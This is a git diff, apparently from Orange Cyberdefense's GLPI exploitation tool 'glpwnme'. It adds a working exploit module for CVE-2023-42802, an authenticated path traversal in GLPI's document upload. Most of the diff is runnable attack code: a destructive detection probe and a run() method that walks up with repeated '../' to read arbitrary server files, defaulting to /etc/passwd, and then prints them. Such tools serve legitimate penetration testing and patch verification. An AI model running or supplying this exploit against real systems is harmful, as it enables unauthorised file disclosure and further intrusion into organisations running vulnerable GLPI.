Orange-Cyberdefense
diff --git a/‎glpwnme/exploits/implementations/__init__.py‎
Lines changed: 6 additions & 0 deletions b/‎glpwnme/exploits/implementations/__init__.py‎
Lines changed: 6 additions & 0 deletions
diff --git a/‎glpwnme/exploits/implementations/cve_2023_42802.py‎
Lines changed: 233 additions & 0 deletions b/‎glpwnme/exploits/implementations/cve_2023_42802.py‎
Lines changed: 233 additions & 0 deletions
@@ -27,6 +27,11 @@
 # GLPI classic check
 from .default_password_check import DEFAULT_PASSWORD_CHECK
 
+from .cve_2023_42802 import CVE_2023_42802
+from .cve_2025_24801 import CVE_2025_24801
+from .cve_2026_42317 import CVE_2026_42317
+from .cve_2026_42320 import CVE_2026_42320
+
 def get_all_exploits():
     """
     Return the exploit available as Class
@@ -38,5 +43,6 @@ def get_all_exploits():
     all_exploits = [CVE_2020_15175, CVE_2022_31061, CVE_2022_35914, UNSERIALIZE_ORDER_2022, CVE_2023_41323, CVE_2023_41326]
     all_exploits += [PHP_UPLOAD, CVE_2024_27937, CVE_2024_29889, CVE_2024_37148, CVE_2024_37149]
     all_exploits += [CVE_2024_40638, CVE_2024_50339, CVE_2025_24799, CVE_2025_32786, CVE_2026_26026]
+    all_exploits += [CVE_2023_42802, CVE_2025_24801, CVE_2026_42317, CVE_2026_42320]
     all_exploits += [DEFAULT_PASSWORD_CHECK]
     return all_exploits
@@ -0,0 +1,233 @@
+import re
+import uuid
+from http import HTTPStatus
+
+from ..exploit import GlpiExploit
+from glpwnme.exploits.logger import Log
+
+
+class CVE_2023_42802(GlpiExploit):
+    """
+    Authenticated Document-upload path traversal (GHSA-rrh2-x4ch-pq3m).
+
+    The vulnerable sink is Document::moveDocument() / Document::moveUploadedDocument()
+    in src/Document.php. When an authenticated user adds a Document, the controller
+    front/document.form.php hands the user-supplied _filename[0] straight to:
+
+        $fullpath = GLPI_TMP_DIR . "/" . $filename;   // moveDocument (staged upload)
+        ...
+        copy($fullpath, GLPI_DOC_DIR . "/" . $new_path);
+
+    The SOURCE path is built from the raw filename without rejecting directory
+    separators, so a filename containing ../ traverses out of files/_tmp and pulls an
+    arbitrary server-side file INTO the document store. The destination is content
+    addressed (sha1 + extension dir), so the WRITE target itself is safe, but the read
+    side gives arbitrary file disclosure: the moved file is then served verbatim by
+    front/document.send.php. The advisory's own mitigation ("remove write access on
+    /ajax and /front for the web server") confirms files can be made to land where they
+    should not.
+
+    Fix in 10.0.10 added to BOTH functions:
+
+        if (str_contains($filename, '/') || str_contains($filename, '\\')) {
+            trigger_error(... 'forbidden for security reasons.' ...);
+            return false;
+        }
+
+    Privilege: AUTHENTICATED user with the Document-create right. The sinks
+    (front/document.form.php, ajax/fileupload.php) call Session::checkLoginUser(), so
+    this is NOT the old (false) unauthenticated front/device.form.php?itemtype=
+    UploadHandler vector.
+
+    DETECTION (destructive behavioral differential)
+    -----------------------------------------------
+    There is no non-destructive black-box signal: the 10.0.10 fix is an internal
+    str_contains() filename guard. So this check performs the real primitive.
+
+      1. Stage a uniquely-named canary .txt via /ajax/fileupload.php -> files/_tmp/<staged>
+         (a normal upload; works on vulnerable AND patched builds).
+      2. Add a Document with _filename[0] = "../_pictures/../_tmp/<staged>" and an empty
+         _prefix_filename[0]. The path bounces through a sibling directory and back, so
+         it can only resolve via genuine directory traversal, and it contains '/' which
+         is exactly what the 10.0.10 guard rejects.
+      3. Download the new Document via /front/document.send.php and look for the canary.
+           - VULNERABLE (<= 10.0.9): the guard is absent, the traversed source resolves,
+             the canary bytes come back  -> FIRED.
+           - PATCHED (>= 10.0.10): moveDocument() returns false at the guard, the stored
+             file is empty, the canary is absent -> SILENT.
+      4. CONTROL: a normal bare filename is added the same way and must come back with
+         its own canary on BOTH builds. This proves the upload endpoint works and that a
+         patched failure is the guard rejecting the traversal, not a broken endpoint.
+
+    All probe Documents are purged afterwards.
+
+    @author glpi
+    @cvss 8.8
+    @name CVE_2023_42802
+    """
+    _impacts = "Path Traversal, Arbitrary File Read, Document Store Escape"
+    _privilege = "User"
+    _is_check_opsec_safe = False
+    min_version = "10.0.7"
+    max_version = "10.0.10"
+
+    _UPLOAD = "/ajax/fileupload.php"
+    _DOC_FORM = "/front/document.form.php"
+    _DOC_SEND = "/front/document.send.php"
+    _DOC_LIST = "/front/document.php?start=0&order=DESC&sort=2"
+
+    # ------------------------------------------------------------------ #
+    # helpers                                                              #
+    # ------------------------------------------------------------------ #
+
+    def _doc_ids(self):
+        """Current set of document ids visible to the session."""
+        t = self.get(self._DOC_LIST, allow_redirects=True).text
+        return set(int(x) for x in re.findall(r"document\.form\.php\?id=(\d+)", t))
+
+    def _stage(self, filename, content):
+        """Stage a file via the AJAX uploader. Returns the on-disk name under
+        files/_tmp (this build stores it under its bare name) or None."""
+        try:
+            r = self.post(self._UPLOAD, data={"name": "filename"}, files={
+                "filename[]": (filename, content, "text/plain"),
+            })
+            return r.json().get("filename", [{}])[0].get("name")
+        except Exception:
+            return None
+
+    def _add_document(self, filename_field):
+        """Add a Document whose _filename[0] is filename_field (empty prefix so no
+        str_replace mangles the extension). Returns the new document id or None."""
+        before = self._doc_ids()
+        data = {
+            "entities_id": "0",
+            "name": f"glpwnme_{uuid.uuid4().hex[:8]}",
+            "_filename[0]": filename_field,
+            "_prefix_filename[0]": "",
+            "_tag_filename[0]": "",
+            "add": "1",
+        }
+        self.post(self._DOC_FORM, data=data, allow_redirects=False)
+        new = self._doc_ids() - before
+        return max(new) if new else None
+
+    def _download(self, docid):
+        r = self.get(f"{self._DOC_SEND}?docid={docid}", allow_redirects=False)
+        return r.status_code, r.content
+
+    def _purge(self, docid):
+        if not docid:
+            return
+        self.post(self._DOC_FORM, data={"id": docid, "purge": "purge"},
+                  allow_redirects=False)
+
+    # ------------------------------------------------------------------ #
+    # interface                                                            #
+    # ------------------------------------------------------------------ #
+
+    def infos(self):
+        infos = "[u]Description:[/u]\n"
+        infos += "Authenticated Document-upload path traversal (GLPI 10.0.7 - 10.0.9).\n"
+        infos += "[b]Document::moveDocument()[/b] / [b]moveUploadedDocument()[/b] built the source\n"
+        infos += "path as [i]GLPI_TMP_DIR.\"/\".$filename[/i] from the user-supplied [i]_filename[/i]\n"
+        infos += "without rejecting directory separators, so a Document filename containing [i]../[/i]\n"
+        infos += "escapes [b]files/_tmp[/b] and pulls an arbitrary server file into the document store,\n"
+        infos += "served back verbatim by [b]document.send.php[/b] (arbitrary file read).\n"
+        infos += "Fix 10.0.10: reject any filename containing '/' or '\\\\'.\n"
+
+        infos += "\n[u]Privilege:[/u]\n"
+        infos += "[b]Authenticated[/b] user with the Document-create right (document.form.php and\n"
+        infos += "ajax/fileupload.php both require a logged-in session).\n"
+
+        infos += "\n[red b]Destructive check[/red b]\n"
+        infos += "No non-destructive differential exists (the fix is an internal filename guard).\n"
+        infos += "The check performs the real traversal: it stages a unique canary, adds a Document\n"
+        infos += "whose filename bounces through a sibling dir back into _tmp, downloads it, and looks\n"
+        infos += "for the canary. A benign normal-filename control must succeed on both builds. All\n"
+        infos += "probe Documents are purged afterwards.\n"
+        return infos
+
+    def check(self):
+        """
+        Destructive behavioral differential (see class docstring).
+
+        canary  = unique marker bytes staged into files/_tmp via fileupload.php
+        trav    = Document added with _filename[0] = ../_pictures/../_tmp/<staged>
+        ctrl    = Document added with a plain bare staged filename
+
+        Vulnerable when the traversal Document streams back the canary (the guard is
+        absent, so the bounced ../ source resolves) while the control also works. On a
+        patched build moveDocument() returns false at the str_contains() guard, the
+        stored file is empty, and the canary never comes back, but the control still
+        succeeds, proving the endpoint is healthy and the rejection is the guard.
+        """
+        trav_id = ctrl_id = None
+        try:
+            # --- traversal probe -------------------------------------------------
+            canary = b"GLPWNME-42802-" + uuid.uuid4().hex.encode()
+            staged = self._stage(f"c_{uuid.uuid4().hex[:8]}.txt", canary)
+            if not staged:
+                Log.log("Could not stage a file via /ajax/fileupload.php "
+                        "(need an authenticated session with the Document-create right)")
+                return False
+
+            trav_id = self._add_document(f"../_pictures/../_tmp/{staged}")
+            fired = False
+            if trav_id is not None:
+                code, body = self._download(trav_id)
+                fired = code == HTTPStatus.OK and canary in body
+
+            # --- benign control --------------------------------------------------
+            ctrl_canary = b"GLPWNME-CTRL-" + uuid.uuid4().hex.encode()
+            ctrl_staged = self._stage(f"k_{uuid.uuid4().hex[:8]}.txt", ctrl_canary)
+            ctrl_ok = False
+            if ctrl_staged:
+                ctrl_id = self._add_document(ctrl_staged)
+                if ctrl_id is not None:
+                    code, body = self._download(ctrl_id)
+                    ctrl_ok = code == HTTPStatus.OK and ctrl_canary in body
+
+            if not ctrl_ok:
+                Log.log("Benign control upload did not round-trip; the Document endpoint is not "
+                        "usable as expected, so the traversal result is inconclusive")
+                return False
+
+            if fired:
+                Log.msg("Path traversal CONFIRMED: a Document filename '../_pictures/../_tmp/<file>' "
+                        "escaped files/_tmp and the planted canary was served back by document.send.php")
+                Log.log("Document::moveDocument() built the source path from the raw filename with no "
+                        "directory-separator guard (fixed in 10.0.10).")
+                return True
+
+            Log.log("Traversal filename was rejected (empty document) while the benign control "
+                    "succeeded: the 10.0.10 str_contains() filename guard is present. Not vulnerable.")
+            return False
+        finally:
+            self._purge(trav_id)
+            self._purge(ctrl_id)
+
+    def run(self, path="/etc/passwd"):
+        """Read an arbitrary server-side file via the document source-path traversal.
+        _filename[0] climbs from files/_tmp to the filesystem root and then to the target.
+        The target must be readable by the web user and carry a GLPI-allowed document
+        extension (the source filename keeps its extension); pick a file accordingly if
+        the default is rejected. The probe Document is purged afterwards."""
+        traversal = "../" * 12 + path.lstrip("/")
+        docid = self._add_document(traversal)
+        if docid is None:
+            Log.err("Could not create the traversal Document (patched, blocked extension, or no "
+                    "Document-create right)")
+            return False
+        try:
+            code, body = self._download(docid)
+            if code == HTTPStatus.OK and body:
+                Log.msg(f"Read [gold3]{path}[/] ({len(body)} bytes) via document source-path traversal:")
+                print(body.decode("utf-8", "replace"))
+                self._write_log(f"CVE-2023-42802 read {path} ({len(body)} bytes)")
+                return True
+            Log.err(f"Empty/blocked response for {path} (patched, file unreadable, or extension "
+                    "rejected by the document type allowlist)")
+            return False
+        finally:
+            self._purge(docid)